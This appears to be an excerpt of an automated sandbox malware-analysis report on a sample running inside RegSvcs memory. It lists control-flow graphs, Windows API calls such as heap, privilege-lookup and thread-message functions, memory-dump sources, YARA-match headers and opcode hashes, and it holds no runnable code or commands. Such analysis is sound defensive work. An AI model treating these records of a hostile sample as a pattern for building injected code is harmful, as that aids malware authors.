                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: 6EA
                                              • API String ID: 1279760036-1400015478
                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 9 41a6a2-41a6a9 10 41a668 9->10 11 41a6ab-41a6cf call 41af60 9->11 12 41a6d0-41a6d8 ExitProcess 10->12 13 41a66a-41a686 10->13 11->12 15 41a68c-41a6a1 RtlFreeHeap 13->15 16 41a687 call 41af60 13->16 16->15
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitFreeHeapProcess
                                              • String ID:
                                              • API String ID: 1180424539-0
                                              • Opcode ID: 31d143caa9eca24f69806e7a72101b43a13d93b00806ab066cce8884b01a96f0
                                              • Instruction ID: 92a4fcfddb1bb9012b982b780685cf7abd6e394ea1b7e1f4ac44d950d937489a
                                              • Opcode Fuzzy Hash: 31d143caa9eca24f69806e7a72101b43a13d93b00806ab066cce8884b01a96f0
                                              • Instruction Fuzzy Hash: 31019EB1611214BBC724DFA8CC85EE77BA8EF48790F158559F94D97241C630E951CBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 221 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 230 40835c-40836e PostThreadMessageW 221->230 231 40838e-408392 221->231 232 408370-40838a call 40a480 230->232 233 40838d 230->233 232->233 233->231
                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 4805d61af589e126ac322dcbf9b57d41b77eff9aa76c243986a94f3a8eeb1c1a
                                              • Instruction ID: f509f28c506fc1502acf3016e9662736af796ea56cd04e6bed4425d109d39191
                                              • Opcode Fuzzy Hash: 4805d61af589e126ac322dcbf9b57d41b77eff9aa76c243986a94f3a8eeb1c1a
                                              • Instruction Fuzzy Hash: D001B931A8031876E720A6959C43FEE7B2C5B40B54F040129FF04BA1C1D6B8690546E6

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 236 408310-40831f 237 408328-40835a call 41ca00 call 40acf0 call 414e50 236->237 238 408323 call 41be60 236->238 245 40835c-40836e PostThreadMessageW 237->245 246 40838e-408392 237->246 238->237 247 408370-40838a call 40a480 245->247 248 40838d 245->248 247->248 248->246
                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                              • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                              • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                              • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: b319d56a657b89ee830632a486787ad2fd66ca893e19236917ca4c92a89627b8
                                              • Instruction ID: b0300b0e5a0f93b64e7a91bc28cf576c226e52ff226fea83028238bb6ceaeedf
                                              • Opcode Fuzzy Hash: b319d56a657b89ee830632a486787ad2fd66ca893e19236917ca4c92a89627b8
                                              • Instruction Fuzzy Hash: A1F039F5201208AFCB10EF59CC85EDB37B9EF49214F118459FD4857742CA34E8198BB5
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: fa60a674ca2026bfa926a1a7cff39482e37ebc0f886f115f9da8f418384b5b06
                                              • Instruction ID: 83d61b0fff270e368098d1d1a5dcbc58d65e690acdbd9cd51dfe8a2c114f1838
                                              • Opcode Fuzzy Hash: fa60a674ca2026bfa926a1a7cff39482e37ebc0f886f115f9da8f418384b5b06
                                              • Instruction Fuzzy Hash: 30E09AB1210208AFC714DFA9CC84FE777A8EF88760F008259F90C9B241C630E911CBB0
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 578ac63ab9fd4ff67b06f1025adf97e8060d9213d5230ceed42daeff64033b6f
                                              • Instruction ID: cb9919b8564060e61d4a7ddba5350142a741dd19acb1f2e491d89a211e7b3542
                                              • Opcode Fuzzy Hash: 578ac63ab9fd4ff67b06f1025adf97e8060d9213d5230ceed42daeff64033b6f
                                              • Instruction Fuzzy Hash: 79D0A9361092840EE702BAA8B8800F6BB28C9C16347488483E4DC8B602E03946A983A6
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 778dc53fd26b86be772bcdf4f5af91a2e6862bee88ae36ed484fc5cdec44e31b
                                              • Instruction ID: 3320dba39b7efa6d930bf50ea1c4bb13541bb197595816b79baee8e57f6f3e46
                                              • Opcode Fuzzy Hash: 778dc53fd26b86be772bcdf4f5af91a2e6862bee88ae36ed484fc5cdec44e31b
                                              • Instruction Fuzzy Hash: 12B04C719015C595DA51A760460861A79006790751F55C072E7020641A47688595F575
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b147d1d93dc4433868fc32bd2daaba521d8e3e8d6ccd079b35f35ddc10dafbb
                                              • Instruction ID: 3509d285b2e8082c44cb121cff423661d58fc7f4fa2b911a34f342d9368d6e37
                                              • Opcode Fuzzy Hash: 3b147d1d93dc4433868fc32bd2daaba521d8e3e8d6ccd079b35f35ddc10dafbb
                                              • Instruction Fuzzy Hash: 2390023160580022924071588884546400597E0342B55C022F5425554D8E188A5B6761
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16f1c3e1717e9e9d4b1fe7e9cb34d75f505a8618dc91aea23c775cd03ea50ac5
                                              • Instruction ID: ad4f1a1edd841f10860d72f802e28bb87b9d7426f5c3a2a4ab3a26b275cb80f2
                                              • Opcode Fuzzy Hash: 16f1c3e1717e9e9d4b1fe7e9cb34d75f505a8618dc91aea23c775cd03ea50ac5
                                              • Instruction Fuzzy Hash: 4A90026160150052424071588804406600597E1342395C126B5555560D8A1C895AA669
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ed854291bf68a11936e02fbb111620f63a6cac161d5bc9c85d0f89adacca47e
                                              • Instruction ID: 67582e4bea2e3561981ec734005f745fa08733dfdd6eeb9083058caddc3bcf14
                                              • Opcode Fuzzy Hash: 0ed854291bf68a11936e02fbb111620f63a6cac161d5bc9c85d0f89adacca47e
                                              • Instruction Fuzzy Hash: 4C900225221400120245B558460450B044597D6392395C026F6417590DCA25896A6721
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9416ec0f750e0cce428dc2596ed9b3494c16d7da306167c6daeedeb8b88e6034
                                              • Instruction ID: ef99e4d0bb4c2c8cc47f6e6c970a75390e34e7d23294a4155eec64b5f8a0de90
                                              • Opcode Fuzzy Hash: 9416ec0f750e0cce428dc2596ed9b3494c16d7da306167c6daeedeb8b88e6034
                                              • Instruction Fuzzy Hash: 599002A1201540A24600B258C404B0A450587E0342B55C027F6055560DC9298956A535
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f9ef8e54452fd134cf76da9ea0b36a420bbcb79e713a85bf88bc4928cdbe3043
                                              • Instruction ID: 7e914c94a1fbd3dc3569085a33ab52c24c0976a85dae9f51c40c9b85806d15cc
                                              • Opcode Fuzzy Hash: f9ef8e54452fd134cf76da9ea0b36a420bbcb79e713a85bf88bc4928cdbe3043
                                              • Instruction Fuzzy Hash: 2A90023120544852D24071588404A46001587D0346F55C022B5065694E9A298E5ABA61
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9852de5731d1538dc25cc112ed4f6882ee1289a51a2b09b05dda01f75e26e5aa
                                              • Instruction ID: 15736ed19bc39590c3b0ae481eb706c1e28d3069266c0873dded908761c5235a
                                              • Opcode Fuzzy Hash: 9852de5731d1538dc25cc112ed4f6882ee1289a51a2b09b05dda01f75e26e5aa
                                              • Instruction Fuzzy Hash: F490023160540812D25071588414746000587D0342F55C022B5025654E8B598B5A7AA1
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e86c3c531f88df5898b046b97bb969c90cb1927c2aa831cd4f6a1d291f7fac9f
                                              • Instruction ID: 0a73205d33d32db7949b9a4ffc8acbe48a0a431f5350a7ee4d80e33d196f2a96
                                              • Opcode Fuzzy Hash: e86c3c531f88df5898b046b97bb969c90cb1927c2aa831cd4f6a1d291f7fac9f
                                              • Instruction Fuzzy Hash: 8E90023120140812D20471588804686000587D0342F55C022BB025655F9A6989967531
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d72e5c45d92729d1b60f65c00faa6716c05b06812ab68e08661470c5092193ca
                                              • Instruction ID: 47edf602b15479779f5d6cb10278c334176a6cbeab004e2d5fd512b4198fede3
                                              • Opcode Fuzzy Hash: d72e5c45d92729d1b60f65c00faa6716c05b06812ab68e08661470c5092193ca
                                              • Instruction Fuzzy Hash: B090023120140413D20071589508707000587D0342F55D422B5425558EDA5A89567521
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 19675e50970ef91949f45cd2dd7c8328a57e7fc360a2ad829a2d046d06298035
                                              • Instruction ID: 3e982469149ee48a9970c971bdbce2076f9c0e196f1c7d6595c2164eec7af4eb
                                              • Opcode Fuzzy Hash: 19675e50970ef91949f45cd2dd7c8328a57e7fc360a2ad829a2d046d06298035
                                              • Instruction Fuzzy Hash: 3390022160540412D24071589418706001587D0342F55D022B5025554ECA5D8B5A7AA1
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c1f5ac9601a2818edf644e71c6ec903975d16d21566473143dbed881e5d325d
                                              • Instruction ID: bf6ed709e9605e451ef8714aada680a8ed883a45090e47142ed5f31d1b33605f
                                              • Opcode Fuzzy Hash: 4c1f5ac9601a2818edf644e71c6ec903975d16d21566473143dbed881e5d325d
                                              • Instruction Fuzzy Hash: C190023120140852D20071588404B46000587E0342F55C027B5125654E8A19C9567921
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a76560ec665bea90661b8be4890ce2d8525e4960313e39d879e22e460b029857
                                              • Instruction ID: 282cdfb53faf22b70ae97946115da142ab96a9096c2cedff15226bb31aeb59c4
                                              • Opcode Fuzzy Hash: a76560ec665bea90661b8be4890ce2d8525e4960313e39d879e22e460b029857
                                              • Instruction Fuzzy Hash: 3890023124140412D24171588404606000997D0382F95C023B5425554F8A598B5BBE61
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a001e5bef59de28ebd7b8156bde35180b86855f2ad049e7fdaf947570b5b3b7a
                                              • Instruction ID: 8ed0cf97598516a444e5ac811abc8a03895a44e7e3d311a7c9beea56b2743dec
                                              • Opcode Fuzzy Hash: a001e5bef59de28ebd7b8156bde35180b86855f2ad049e7fdaf947570b5b3b7a
                                              • Instruction Fuzzy Hash: C790022120544452D20075589408A06000587D0346F55D022B6065595ECA398956B531
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc784c341d68db5bc7c5b98f12d67514715516b76f08cc554d1d0d9bfe2bbce3
                                              • Instruction ID: 31b740999acee891ea5ef771aa5c485008563b3b267add33c7db1cd46f25083c
                                              • Opcode Fuzzy Hash: fc784c341d68db5bc7c5b98f12d67514715516b76f08cc554d1d0d9bfe2bbce3
                                              • Instruction Fuzzy Hash: 0C90026120180413D24075588804607000587D0343F55C022B7065555F8E2D8D567535
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c140bf03d5fc3f9e58c03d9e61a95d5d09541c4d0cd2af7ba5e664bde8335541
                                              • Instruction ID: c223cb147e410e7525fcf206ec39b4d10f6cf4ddb4cd6ab7c95a61d09105d804
                                              • Opcode Fuzzy Hash: c140bf03d5fc3f9e58c03d9e61a95d5d09541c4d0cd2af7ba5e664bde8335541
                                              • Instruction Fuzzy Hash: E390022130140412D202715884146060009C7D1386F95C023F6425555E8A298A57B532
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7480c7e12ba1597ecd598c72f54084a6f4aacea721a7b0d6783d29d363ee3f7d
                                              • Instruction ID: 840e916fd6a9c47d42705d083a7d3ed78ef32f061a03f6a284cacdf28eae6bbf
                                              • Opcode Fuzzy Hash: 7480c7e12ba1597ecd598c72f54084a6f4aacea721a7b0d6783d29d363ee3f7d
                                              • Instruction Fuzzy Hash: 1E90023120180412D20071588808747000587D0343F55C022BA165555F8A69C9967931
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3f8255ca39b9e1551d0630d108b2a9a172972d99952c93daa206ddff7b66fa9
                                              • Instruction ID: 943c19b37d107224b83827e6e9c35ae29c61375e5f793b0371e8d8ab6f54b20d
                                              • Opcode Fuzzy Hash: c3f8255ca39b9e1551d0630d108b2a9a172972d99952c93daa206ddff7b66fa9
                                              • Instruction Fuzzy Hash: 4E90026121140052D20471588404706004587E1342F55C023B7155554DC92D8D666525
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c8ffcbb8362e4a41f4278d4acce6c35f15ef900c15e237eabd0247edcf15efc3
                                              • Instruction ID: a78953a92c51b345c8c653c2d83aab7f8f1bb36ec15cafe95320ad0865828bf5
                                              • Opcode Fuzzy Hash: c8ffcbb8362e4a41f4278d4acce6c35f15ef900c15e237eabd0247edcf15efc3
                                              • Instruction Fuzzy Hash: 7C90022124140812D2407158C4147070006C7D0742F55C022B5025554E8A1A8A6A7AB1
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e07e1425991512d01031cd18c85ec17513315f26f3039bd60076ab4a1c1f57b4
                                              • Instruction ID: 39280d9538ef29f55ad473470fd0e43231b97db39a1f32465afc307a1d807335
                                              • Opcode Fuzzy Hash: e07e1425991512d01031cd18c85ec17513315f26f3039bd60076ab4a1c1f57b4
                                              • Instruction Fuzzy Hash: 3990022120184452D24072588804B0F410587E1343F95C02AB9157554DCD19895A6B21
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5e0e9d7756d75a96df7f7f1483b5681bdbc4bc2ad4573f6f7cb33fc8de9a3c7
                                              • Instruction ID: a0f46d5f5e00675066195bad244b823c7747e883b279dd30f3ac9d0350be0307
                                              • Opcode Fuzzy Hash: c5e0e9d7756d75a96df7f7f1483b5681bdbc4bc2ad4573f6f7cb33fc8de9a3c7
                                              • Instruction Fuzzy Hash: 8190023160550412D20071588514706100587D0342F65C422B5425568E8B998A5679A2
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8228befe5f5f95dc2e4c5a6e39ceca343e173095e0a1deba10e59c95f698de8a
                                              • Instruction ID: 89c77939bcba45ae8eae0b6a0975356f6a0a4baeaf01be8881ca451dc7693e57
                                              • Opcode Fuzzy Hash: 8228befe5f5f95dc2e4c5a6e39ceca343e173095e0a1deba10e59c95f698de8a
                                              • Instruction Fuzzy Hash: A490022124545112D250715C84046164005A7E0342F55C032B5815594E8959895A7621
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0b38ed80171e722ce316b5b5d65e039b0cdbc955e196c7c06f902013cd597a0e
                                              • Instruction ID: 2f24168f34525df494dd1ee65fdc98506ff1667a22e76bfcfc89d3da2c114205
                                              • Opcode Fuzzy Hash: 0b38ed80171e722ce316b5b5d65e039b0cdbc955e196c7c06f902013cd597a0e
                                              • Instruction Fuzzy Hash: F390023520140412D61071589804646004687D0342F55D422B5425558E8A5889A6B521
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a428b411ac8d4d5d676d7b39a9d05b8d0c0f4e8c917fe52355bbc68b696f1e0c
                                              • Instruction ID: c2bd764d4fdf0aac35af0c0c59cfcbefcd8f1f59b3a43e9b58612ce38fef7efc
                                              • Opcode Fuzzy Hash: a428b411ac8d4d5d676d7b39a9d05b8d0c0f4e8c917fe52355bbc68b696f1e0c
                                              • Instruction Fuzzy Hash: BF90023120240152964072589804A4E410587E1343B95D426B5016554DCD1889666621
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
